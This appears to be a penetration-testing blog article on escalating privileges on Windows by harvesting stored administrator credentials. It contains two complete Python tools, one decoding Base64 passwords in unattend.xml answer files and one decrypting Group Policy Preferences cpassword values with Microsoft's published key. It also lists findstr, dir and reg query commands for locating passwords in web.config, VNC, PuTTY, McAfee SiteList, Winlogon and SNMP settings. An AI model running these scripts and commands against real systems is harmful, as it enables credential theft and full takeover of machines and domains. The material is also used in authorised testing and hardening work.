When an attacker has gained a foothold on a system, one of the first moves is to search it for credentials of the local administrator account, since those allow the box to be fully compromised. This is one of the easiest ways of escalating privileges on a Windows system, and the purpose of this article is to examine the common places where such credentials may be found in order to assist with that process.

Windows Files

It is very common for administrators to use Windows Deployment Services to create an image of a Windows operating system and deploy it to many systems across the network. This is called an unattended installation, and it is driven by answer files (unattend.xml, sysprep.inf, sysprep.xml). The problem with unattended installations is that the local administrator password is stored in these answer files, either in plaintext or Base64-encoded, and Base64 is an encoding rather than protection, so it reverses trivially. The files are often left behind after deployment in the following locations:


There is also a Metasploit post-exploitation module which discovers credentials in unattended installation files:

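As an added example (not code from the original article or from the Metasploit module), the following Python script parses an unattend.xml answer file and reverses the Base64 encoding of the passwords it holds, covering the built-in Administrator password, extra local accounts and the AutoLogon entry. The answer file embedded in it is constructed for this example; the element names and the urn:schemas-microsoft-com:unattend namespace follow the answer-file format, while the suffix that Setup appends before encoding ("Password", or "AdministratorPassword" for the built-in administrator's value) is an assumption to confirm against real files.

```python
"""Recover passwords from a Windows unattended-install answer file.

Added example, not the article's or Metasploit's code. The suffix stripped
after decoding is an assumption (see lead-in); everything else is plain XML
parsing plus Base64/UTF-16LE decoding.
"""
import base64
import sys
import xml.etree.ElementTree as ET

# Namespace used by unattend.xml answer files.
NS = {"u": "urn:schemas-microsoft-com:unattend"}


def _tag(name: str) -> str:
    return "{%s}%s" % (NS["u"], name)


def encode_unattend_password(password: str, suffix: str = "Password") -> str:
    """Encode the way a non-PlainText answer file stores a password:
    UTF-16LE of (password + suffix), then Base64. Used here to build the sample."""
    return base64.b64encode((password + suffix).encode("utf-16-le")).decode("ascii")


def decode_unattend_password(value: str, plain_text: bool, suffix: str = "Password") -> str:
    """Reverse the encoding. Base64 is not encryption: no key is involved."""
    if plain_text:
        return value
    decoded = base64.b64decode(value).decode("utf-16-le")
    # Assumption: Setup appended this suffix before encoding; strip it.
    if decoded.endswith(suffix):
        decoded = decoded[: -len(suffix)]
    return decoded


def _is_plain(container) -> bool:
    """<PlainText>true</PlainText> marks a value that was not encoded."""
    text = container.findtext("u:PlainText", default="", namespaces=NS) or ""
    return text.strip().lower() == "true"


def _password_of(container, suffix: str):
    """container holds <Value> and optionally <PlainText>."""
    value = (container.findtext("u:Value", default="", namespaces=NS) or "").strip()
    if not value:
        return None
    return decode_unattend_password(value, _is_plain(container), suffix)


def extract_passwords(xml_data):
    """Return (setting, account, password) tuples for every credential found."""
    root = ET.fromstring(xml_data)
    found = []
    # UserAccounts/AdministratorPassword: the built-in Administrator
    for elem in root.iter(_tag("AdministratorPassword")):
        pw = _password_of(elem, "AdministratorPassword")
        if pw is not None:
            found.append(("AdministratorPassword", "Administrator", pw))
    # UserAccounts/LocalAccounts/LocalAccount: extra local users created at setup
    for acct in root.iter(_tag("LocalAccount")):
        pw_elem = acct.find("u:Password", NS)
        pw = _password_of(pw_elem, "Password") if pw_elem is not None else None
        if pw is not None:
            found.append(("LocalAccount", acct.findtext("u:Name", default="?", namespaces=NS), pw))
    # AutoLogon: the account Windows signs in automatically after setup
    for auto in root.iter(_tag("AutoLogon")):
        pw_elem = auto.find("u:Password", NS)
        pw = _password_of(pw_elem, "Password") if pw_elem is not None else None
        if pw is not None:
            found.append(("AutoLogon", auto.findtext("u:Username", default="?", namespaces=NS), pw))
    return found


# Constructed sample answer file (not a real deployment artefact).
SAMPLE_UNATTEND = """<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>deploy</Name>
            <Password><Value>Summer2014!</Value><PlainText>true</PlainText></Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Username>Administrator</Username>
        <Password><Value>{}</Value><PlainText>false</PlainText></Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
""".format(encode_unattend_password("Adm1n!Pass", "AdministratorPassword"),
           encode_unattend_password("Adm1n!Pass", "Password"))

if __name__ == "__main__":
    # Pass the path of a collected unattend.xml, or run without arguments for the sample.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_UNATTEND
    for setting, account, password in extract_passwords(data):
        print("%-22s %-15s %s" % (setting, account, password))
```

Point the script at any unattend.xml or sysprep.xml the dir commands later in this article turn up; the same decoding applies to every Value element whose PlainText is false.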

If the system is running an IIS web server, the web.config file should be checked, as it might contain administrator credentials in plaintext (in the credentials element shown below, and commonly also in connection strings). The file is usually found in the following directories:


A sample of a web.config file with the administrator credentials can be seen below:

<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.web>
    <authentication mode="Windows">
      <credentials passwordFormat="Clear">
        <user name="Admin" password="Admin" />
      </credentials>
    </authentication>
  </system.web>
</configuration>

Local administrator passwords can also be retrieved via Group Policy Preferences. When a GPP is used to set a local account password, the Groups.xml file that carries it is cached locally on every machine the policy applied to, and the original can also be read from the domain controller's SYSVOL share (under the Policies folder of the GPO's GUID), because every authenticated domain user has read access to it. The password in the cpassword attribute is AES-256 encrypted, but Microsoft published the static key in its documentation, so anyone who obtains the file can decrypt it. Microsoft's MS14-025 update stopped the GPP editor from setting new passwords, but it does not remove existing files, so this still yields results in domains where old policies were never cleaned up.

C:\ProgramData\Microsoft\Group Policy\History\????\Machine\Preferences\Groups\Groups.xml

Apart from Groups.xml, the cpassword attribute can be found in other preference files as well, such as:


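The decryption described above, as an added example that is not code from the original article or from any tool it names: the Python below decrypts cpassword values with the key Microsoft published and walks a preference file for every element that carries the attribute, so it works on Groups.xml and on the other preference files alike. The Groups.xml embedded in it is constructed for this example; its cpassword is the widely circulated test value that decrypts to Local*P4ssword!. The account-attribute names per file type are an assumption taken from the common layouts, and the script needs the cryptography package (pycryptodome as a fallback).

```python
"""Decrypt Group Policy Preferences cpassword values.

Added example, not the article's code. Key: the static AES-256 key Microsoft
published; sample XML: constructed for this example.
"""
import base64
import sys
import xml.etree.ElementTree as ET

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
        dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
        return dec.update(data) + dec.finalize()
except ImportError:  # fall back to pycryptodome if "cryptography" is absent
    from Crypto.Cipher import AES

    def _aes_cbc_decrypt(key: bytes, iv: bytes, data: bytes) -> bytes:
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)

# The key Microsoft published in the MS-GPPREF documentation. It is the same on
# every domain, so "encrypted" here is no better than "encoded".
GPP_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b")
GPP_IV = bytes(16)  # all-zero IV

# Attribute naming the account, by preference type (assumption based on the
# common layouts: Groups/Drives use userName, Services accountName,
# ScheduledTasks runAs, DataSources/Printers username).
ACCOUNT_ATTRS = ("userName", "accountName", "runAs", "username")


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC decrypt a cpassword attribute value back to the password."""
    # The attribute is usually written without Base64 padding; restore it.
    padded = cpassword + "=" * (-len(cpassword) % 4)
    plaintext = _aes_cbc_decrypt(GPP_KEY, GPP_IV, base64.b64decode(padded))
    # Validate and strip PKCS#7 padding, then decode the UTF-16LE password.
    pad = plaintext[-1]
    if not 1 <= pad <= 16 or plaintext[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: value is not a cpassword or is corrupted")
    return plaintext[:-pad].decode("utf-16-le")


def find_cpasswords(xml_data):
    """Walk a preference XML file and return (item tag, account, password)
    for every element carrying a cpassword attribute."""
    root = ET.fromstring(xml_data)
    parent = {child: p for p in root.iter() for child in p}
    found = []
    for elem in root.iter():
        enc = elem.attrib.get("cpassword")
        if not enc:
            continue
        account = next((elem.attrib[a] for a in ACCOUNT_ATTRS if a in elem.attrib), "?")
        # cpassword sits on <Properties>; report the enclosing item (User, Service, ...).
        item = parent.get(elem, elem).tag
        found.append((item, account, decrypt_cpassword(enc)))
    return found


# Constructed Groups.xml; the cpassword is the well-known public test value.
SAMPLE_GROUPS_XML = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="Administrator (built-in)" changed="2014-05-13 10:15:00">
    <Properties action="U" newName="" fullName="" description=""
      cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw="
      changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
      subAuthority="RID_ADMIN" userName="Administrator (built-in)"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    # Pass a Groups.xml (or Services.xml, ScheduledTasks.xml, ...) from the local
    # cache or SYSVOL; with no argument the constructed sample is used.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_GROUPS_XML
    for item, account, password in find_cpasswords(data):
        print("%-14s %-28s %s" % (item, account, password))
```

Because the key and IV are fixed, the same function decrypts a value copied out of any preference file from any domain; there is nothing per-domain to recover first.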

Instead of manually browsing all the files on the system, it is also possible to run the following commands, which search subdirectories recursively (/s) and case-insensitively (/i) for files that contain the word password:

findstr /si password *.txt
findstr /si password *.xml
findstr /si password *.ini

Alternatively, the following commands, run from the root of the C: drive, will return the locations of files in which elevated credentials might be stored:

C:\> dir /b /s unattend.xml
C:\> dir /b /s web.config
C:\> dir /b /s sysprep.inf
C:\> dir /b /s sysprep.xml
C:\> dir /b /s *pass*
C:\> dir /b /s vnc.ini

Third Party Software


Many Windows systems run McAfee as their endpoint protection. The ePolicy Orchestrator agent keeps the credentials it uses to reach its update repositories in the SiteList.xml file; the password is stored encrypted, but with a static key, and published tools can reverse it:

%AllUsersProfile%\Application Data\McAfee\Common Framework\SiteList.xml


Administrators sometimes use VNC software instead of Windows Terminal Services for remote administration of the system. The VNC password is stored encrypted, but with a fixed key, so there are various tools that can decrypt it.




In RealVNC the encrypted password is stored in the following registry value:

reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password


PuTTY stores proxy credentials in clear text in the registry, under each saved session (the ProxyUsername and ProxyPassword values). Querying the Sessions key recursively lists them:

reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" /s


The registry itself can also be searched, as on some occasions it contains credentials. The first two commands search every string value under HKLM and HKCU for the word password; the other two check two well-known locations, the Windows autologon settings (DefaultUserName and DefaultPassword under Winlogon) and the SNMP community strings, which live in the Parameters subkey of the SNMP service:

reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s

Windows Autologon:
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

SNMP Parameters:
reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" /s


PowerSploit can also be used to discover stored credentials. Specifically, it supports the following modules, which check for credentials, encrypted or plaintext, in various files and in the registry:



    1. Thanks! I was aware of this tool, however this is considered a password recovery tool for third party software mainly. The purpose of this article was to examine locations where local administrator passwords are stored in order to perform privilege escalation. However, I can see the value of this tool as well.
